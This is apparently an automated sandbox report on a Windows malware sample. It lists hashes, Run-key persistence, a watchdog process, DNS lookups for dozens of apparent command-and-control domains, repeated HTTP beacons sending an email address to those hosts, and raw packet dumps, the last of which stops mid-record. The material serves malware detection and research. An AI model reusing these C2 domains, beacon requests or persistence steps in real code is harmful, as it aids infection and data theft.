Analysis Date2013-09-01 15:54:43
MD5ebb928d03703ef34c1c273042c6b6eb2
SHA1edaf0faab635f436789ee9d9a0def9203530b8a3

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: f7161097ddd48a4a0a3df5616618fd78 sha1: 4e802529a2f277f23332bbd20d01553a0c9ebf2f size: 226816
Section.rdata md5: 9c09e3519a968fa3ad8dff606367904c sha1: d228bd0e64c49c985addf0a2b9ae37a50e173178 size: 29184
Section.data md5: b84de1eba785da01aab676d1058290b5 sha1: ce1632b5b19b8004f84fa4fc48f0d63e04bc72d2 size: 9216
Timestamp2011-12-07 13:20:17
PackerMicrosoft Visual C++ ?.?
PEhash329153441ef90d67c28e334582dce2b2db01b931
AVavgAgent_r.AVD
AVmsseVirTool:Win32/Obfuscator.AAV

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Publication Policy Builder Web Propagation ➝
C:\Documents and Settings\Administrator\Local Settings\Application Data\xe0i9uz\uwz9pnbqzlb7.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\xe0i9uz\uwz9pnbqzlb7.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Application Data\xe0i9uz\uwz9pnbqzlb7.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Application Data\xe0i9uz\uwz9pnbqzlb7.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\xe0i9uz\c3z9ssgjk.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\xe0i9uz\uwz9pnbqzlb7.qk0
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\xe0i9uz\uwz9pnbqzlb7.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\xe0i9uz\uwz9pnbqzlb7.exe"

Network Details:

DNShaselopricezat.com
Type: A
208.73.210.155
DNSoppored.com
Type: A
69.43.161.169
DNSpulaminacee.com
Type: A
208.73.210.155
DNSburitosasrl.com
Type: A
69.43.161.170
DNSrebalt.com
Type: A
184.168.221.2
DNSgonotar.com
Type: A
208.73.210.155
DNSelverot.com
Type: A
208.73.210.155
DNSfalaterest.com
Type: A
208.73.210.155
DNSpapadov.com
Type: A
208.73.211.246
DNSbadero.com
Type: A
50.63.202.67
DNSjimberolipop.com
Type: A
208.73.210.155
DNSglostmec.com
Type: A
208.73.210.155
DNSiberan.com
Type: A
208.73.211.230
DNSburitoriso.com
Type: A
208.73.211.249
DNSpoleric.com
Type: A
208.73.210.155
DNSvadelt.com
Type: A
208.73.210.155
DNSgehereiroplop.com
Type: A
208.73.210.155
DNSelectow.com
Type: A
208.73.210.155
DNSekendar.com
Type: A
208.73.210.155
DNSswcopilserits.com
Type: A
208.73.210.155
DNSmelixe.com
Type: A
208.73.210.155
DNSbilode.com
Type: A
209.99.40.226
DNSmarjepolirst.com
Type: A
208.73.210.155
DNSmogohet.com
Type: A
208.73.210.155
DNShartend.com
Type: A
208.73.210.155
DNSferetolopazerns.com
Type: A
208.73.210.155
DNSmacandpa.com
Type: A
208.73.211.247
DNSlocoand.com
Type: A
208.73.210.155
DNSnerlestitops.com
Type: A
208.73.211.246
DNSjondiret.com
Type: A
208.73.211.246
DNSbinerat.com
Type: A
208.73.210.155
DNSherolopcazers.com
Type: A
208.73.210.155
DNSvadaxer.com
Type: A
208.73.210.155
DNSfontored.com
Type: A
64.15.71.22
DNSaderino.com
Type: A
209.99.40.223
DNSklestar.com
Type: A
72.10.147.6
DNSklestar.com
Type: A
72.10.147.5
DNSmianaf.com
Type: A
208.73.210.155
DNSnaimied.com
Type: A
208.73.210.155
DNSdengodar.com
Type: A
208.73.210.155
DNSbezedete.com
Type: A
209.99.40.227
DNSgesqwaserops.com
Type: A
DNSfiatelox.com
Type: A
DNSdafatan.com
Type: A
HTTP GEThttp://haselopricezat.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://oppored.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://pulaminacee.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://buritosasrl.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://rebalt.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://gonotar.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://elverot.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://falaterest.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://papadov.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://badero.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://jimberolipop.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://glostmec.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://iberan.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://buritoriso.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://poleric.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://vadelt.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://gehereiroplop.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://electow.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://ekendar.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://swcopilserits.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://melixe.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://bilode.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://marjepolirst.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://mogohet.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://hartend.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://feretolopazerns.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://macandpa.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://locoand.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://nerlestitops.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://jondiret.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://binerat.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://herolopcazers.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://vadaxer.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://fontored.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://aderino.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://falaterest.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://klestar.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://mianaf.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://naimied.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://dengodar.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
HTTP GEThttp://bezedete.com/forum/search.php?email=jasonsalisbury1@hotmail.com
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1032 ➝ 69.43.161.169:80
Flows TCP192.168.1.1:1033 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1034 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1035 ➝ 184.168.221.2:80
Flows TCP192.168.1.1:1036 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1037 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1038 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1039 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1040 ➝ 50.63.202.67:80
Flows TCP192.168.1.1:1041 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1042 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1043 ➝ 208.73.211.230:80
Flows TCP192.168.1.1:1044 ➝ 208.73.211.249:80
Flows TCP192.168.1.1:1045 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1046 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1047 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1048 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1049 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1050 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1051 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1052 ➝ 209.99.40.226:80
Flows TCP192.168.1.1:1053 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1054 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1055 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1056 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1057 ➝ 208.73.211.247:80
Flows TCP192.168.1.1:1058 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1059 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1060 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1061 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1062 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1063 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1064 ➝ 64.15.71.22:80
Flows TCP192.168.1.1:1065 ➝ 209.99.40.223:80
Flows TCP192.168.1.1:1066 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1067 ➝ 72.10.147.6:80
Flows TCP192.168.1.1:1068 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1069 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1070 ➝ 208.73.210.155:80
Flows TCP192.168.1.1:1071 ➝ 209.99.40.227:80

Raw Pcap
0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 68617365 6c6f7072   ..Host: haselopr
0x00000070 (00112)   6963657a 61742e63 6f6d0d0a 0d0a       icezat.com....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6f70706f 7265642e   ..Host: oppored.
0x00000070 (00112)   636f6d0d 0a0d0a63 6f6d0d0a 0d0a       com....com....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 70756c61 6d696e61   ..Host: pulamina
0x00000070 (00112)   6365652e 636f6d0d 0a0d0a0a 0d0a       cee.com.......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62757269 746f7361   ..Host: buritosa
0x00000070 (00112)   73726c2e 636f6d0d 0a0d0a0a 0d0a       srl.com.......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 72656261 6c742e63   ..Host: rebalt.c
0x00000070 (00112)   6f6d0d0a 0d0a6d0d 0a0d0a0a 0d0a       om....m.......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 676f6e6f 7461722e   ..Host: gonotar.
0x00000070 (00112)   636f6d0d 0a0d0a0d 0a0d0a0a 0d0a       com...........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 656c7665 726f742e   ..Host: elverot.
0x00000070 (00112)   636f6d0d 0a0d0a0d 0a0d0a0a 0d0a       com...........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 66616c61 74657265   ..Host: falatere
0x00000070 (00112)   73742e63 6f6d0d0a 0d0a0a0a 0d0a       st.com........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 70617061 646f762e   ..Host: papadov.
0x00000070 (00112)   636f6d0d 0a0d0a0a 0d0a0a0a 0d0a       com...........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62616465 726f2e63   ..Host: badero.c
0x00000070 (00112)   6f6d0d0a 0d0a0a0a 0d0a0a0a 0d0a       om............

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6a696d62 65726f6c   ..Host: jimberol
0x00000070 (00112)   69706f70 2e636f6d 0d0a0d0a 0d0a       ipop.com......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 676c6f73 746d6563   ..Host: glostmec
0x00000070 (00112)   2e636f6d 0d0a0d0a 0d0a0d0a 0d0a       .com..........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 69626572 616e2e63   ..Host: iberan.c
0x00000070 (00112)   6f6d0d0a 0d0a0d0a 0d0a0d0a 0d0a       om............

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62757269 746f7269   ..Host: buritori
0x00000070 (00112)   736f2e63 6f6d0d0a 0d0a0d0a 0d0a       so.com........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 706f6c65 7269632e   ..Host: poleric.
0x00000070 (00112)   636f6d0d 0a0d0a0a 0d0a0d0a 0d0a       com...........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 76616465 6c742e63   ..Host: vadelt.c
0x00000070 (00112)   6f6d0d0a 0d0a0a0a 0d0a0d0a 0d0a       om............

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 67656865 72656972   ..Host: gehereir
0x00000070 (00112)   6f706c6f 702e636f 6d0d0a0d 0a0a       oplop.com.....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 656c6563 746f772e   ..Host: electow.
0x00000070 (00112)   636f6d0d 0a0d0a6f 6d0d0a0d 0a0a       com....om.....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 656b656e 6461722e   ..Host: ekendar.
0x00000070 (00112)   636f6d0d 0a0d0a6f 6d0d0a0d 0a0a       com....om.....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 7377636f 70696c73   ..Host: swcopils
0x00000070 (00112)   65726974 732e636f 6d0d0a0d 0a0a       erits.com.....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6d656c69 78652e63   ..Host: melixe.c
0x00000070 (00112)   6f6d0d0a 0d0a636f 6d0d0a0d 0a0a       om....com.....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62696c6f 64652e63   ..Host: bilode.c
0x00000070 (00112)   6f6d0d0a 0d0a636f 6d0d0a0d 0a0a       om....com.....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6d61726a 65706f6c   ..Host: marjepol
0x00000070 (00112)   69727374 2e636f6d 0d0a0d0a 0a0a       irst.com......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6d6f676f 6865742e   ..Host: mogohet.
0x00000070 (00112)   636f6d0d 0a0d0a6d 0d0a0d0a 0a0a       com....m......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 68617274 656e642e   ..Host: hartend.
0x00000070 (00112)   636f6d0d 0a0d0a6d 0d0a0d0a 0a0a       com....m......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 66657265 746f6c6f   ..Host: feretolo
0x00000070 (00112)   70617a65 726e732e 636f6d0d 0a0d0a     pazerns.com....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6d616361 6e647061   ..Host: macandpa
0x00000070 (00112)   2e636f6d 0d0a0d0a 636f6d0d 0a0d0a     .com....com....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
